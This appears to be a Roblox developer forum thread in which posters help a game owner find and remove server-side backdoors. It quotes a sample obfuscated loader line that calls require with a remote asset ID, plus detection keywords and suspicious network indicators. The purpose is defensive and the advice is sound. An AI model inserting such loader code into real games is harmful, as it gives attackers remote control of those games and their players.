No because once one finds out how to reverse it they tend to spread it. Skids exist
Yeah we cant if hackers are not here.
ill try finding a scripter who can help me with that
Recently I made my own admin commands. You can use them if you want: JAdmin Commands - Roblox. You can also find the Module that my admin uses, so you can know that it doesn’t have any viruses. It has also a global ban function that allows you to ban a player that’s not on the server that you are. The commands will also kick him if they find that player on one of the game servers. My admin doesn’t use HTTP Service now, but it should have access to Data Store Service- it saves bans.
Join the game and open dev console. Go to the scripts tab and look for anything you don’t think you created.
Also, if you have HTTP service enabled, look at the network tab. If you see “weird” network activity like HTTP requests to domains like discord, builderman.xyz, etc. that you are not making then your game probably has a backdoor in it.
You might be able to find these malicious models by pressing ctrl + alt + f in studio and searching for getfenv or require. You’re likely to unuse getfenv and lots of malicious models use it to obscure what they’re doing.
2 Likes
If they cant still remove backdoor then they have to do this. A backdoor disguised as a "fast load" place - #9 by BankrollHero
1 Like
Why don’t people make exploits for their own game and sell them lol. It’d be the ultimate pro gamer move.
Then when you feel like it, “patch out” the exploits and come up with “new ones”.
But yeah you should check httpservice
1 Like
lol thats a good idea but itll ruin the game for players who cant buy those exploits
When you said hackers even had exploits after you removed HD admin, do you mean they were still able to ban players? Or just exploits in general?
Either being caused by an insecure remote or a serverside backdoor. (would probably be the latter)
Backdoors are caused by infected free models or plugins.
(Don’t freak out, removal is as easy as 1, 2, 3!)
Go through your plugins, and see if one is not created by a trusted source.
(With the BTRoblox extension, you can easily view source code of plugins)
If there is an infected one, it will probably look something like
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5723263360)
or some obfuscated code that looks like
return(function(lIIIllIIIllIIlllllIllIl,IIIlIIIlllllIl,IIIlIllIIIIlllIIlI)local lIIllIlIII=string.char;local IlIllIIlllllIIIll=string.sub;local lIIlIIIllIllIIllIlIlIlIII=table.concat;local lIIlIIllII=math.ldexp;
It looks intimidating, but it’s really just hiding the script through a bunch of strange encryption.
Key things to look for are: getfenv, require, string.reverse
If you find a plugin that has this, simply remove it.
If there is not a plugin that has that, look for the same stuff by going through scripts in your explorer.
(A common technique to hide the malicious code is to spam whitespace and hide it to the far right of the script, so make sure you are checking there as well!)
Edit: It’s also very possible that your version of HD admin is not the official one and contains a backdoor in itself. (thanks for Dusk_ie for pointing this out)
Edit 2: If it’s not caused by the admin itself, make sure to go through the steps I showed above.
7 Likes
Actually when using sha or any hash algorithm you cannot derive it. It isnt a pure function that is what makes it so special, there isnt really a equation other than the exact value you gave it
Not sure why it hasn’t already been suggested but it’s possible your version of HD admin is not the official one and contains a backdoor. Make sure you get the official version of HD admin. Alternatively, try using a different suite (I prefer Adonis personally).
If these exploits are indeed still occurring after you’ve removed the admin then there is likely a backdoor script elsewhere in the game.
Alright it was plagued with old 2008 viruses which I removed, and then I found a few backdoors. They’re removed now.
Alright game should be good now. Let me know if the problem persists. @prohriday
oh ok lets try and ty for helping means alot 
1 Like
You have a server sided backdoor in your game. HD admin among other vulnerable admin systems can grant permissions from the server. I believe this is done via the _G.HDAdminMain ‘PlayerData’ module.
No problem dude, glad I could help.
1 Like
“encrypting data on the client” is more than misleading, you’re just obfuscating things, clients have access to all replicated data
tldr;
if possible, don’t use third party scripts, delete all scripts that you don’t know the origin of, put server-side scripts in server script service, the scripts are invisible to clients there
2 Likes
ok thank you for the help i appriciate it
1 Like
Make a server side admin powers that use chat instead of GUIs and events. You can learn about the differences here:
And here is some info on how hackers do this:
1 Like
server script code is invisible regardless of where it is.
1 Like